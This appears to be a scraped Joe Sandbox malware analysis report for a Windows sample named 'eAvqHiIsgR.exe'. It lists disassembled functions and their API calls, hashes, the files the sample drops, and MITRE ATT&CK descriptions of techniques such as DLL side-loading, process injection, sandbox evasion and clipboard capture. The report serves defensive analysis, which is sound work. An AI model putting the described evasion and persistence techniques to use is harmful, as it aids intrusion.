Function 00403875 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,75923410,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
GlobalFree.KERNEL32(0053B8D8), ref: 00403896

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403875

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88

Function 00405AD6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\eAvqHiIsgR.exe,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00405ADC
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\eAvqHiIsgR.exe,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00405AEA

Strings

C:\Users\user\Desktop, xrefs: 00405AD6

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD

Function 72A410E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 72A4115B
GlobalFree.KERNEL32(00000000), ref: 72A411B4
GlobalFree.KERNEL32(?), ref: 72A411C7
GlobalFree.KERNEL32(?), ref: 72A411F5

Memory Dump Source

Source File: 00000000.00000002.3692894064.0000000072A41000.00000020.00000001.01000000.00000005.sdmp, Offset: 72A40000, based on PE: true

Associated: 00000000.00000002.3692870436.0000000072A40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3692910209.0000000072A43000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3692981384.0000000072A45000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a40000_eAvqHiIsgR.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: eda68e530c814f571262f754ce6e5a61c14ead4406f397b5d2501887e861c962
Instruction ID: 0c44cbf732d1172e97f41cd839970ba33786fec4d15858de0d30144e15e322eb
Opcode Fuzzy Hash: eda68e530c814f571262f754ce6e5a61c14ead4406f397b5d2501887e861c962
Instruction Fuzzy Hash: 6531B5B29442449FE7018F6DD984B257FF8EB49344B34792DE846C6158DF39E916CB10

Function 00405BF5 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report eAvqHiIsgR.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nso2EAF.tmp\System.dll

C:\Users\user\tranchet\Anthracomarti.Ido

C:\Users\user\tranchet\Trskelkvotients.Hel

C:\Users\user\tranchet\computerskrmen.dem

C:\Users\user\tranchet\predictors.dut

C:\Users\user\tranchet\receptionssekretrer.bin

C:\Users\user\tranchet\serenissimi.txt

C:\Windows\Arder.lnk

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
eAvqHiIsgR.exe

Function 00403348 Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366
stringcomfileCOMMON

Function 004058BF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 0040390A Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402EA1 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 181
memoryCOMMON

Function 0040618A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 004030D8 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166
COMMON

Function 00401E35 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Function 004056E4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Function 00406492 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00405CBF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 00402CD0 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Function 72A416DB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 00401C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Function 00402476 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON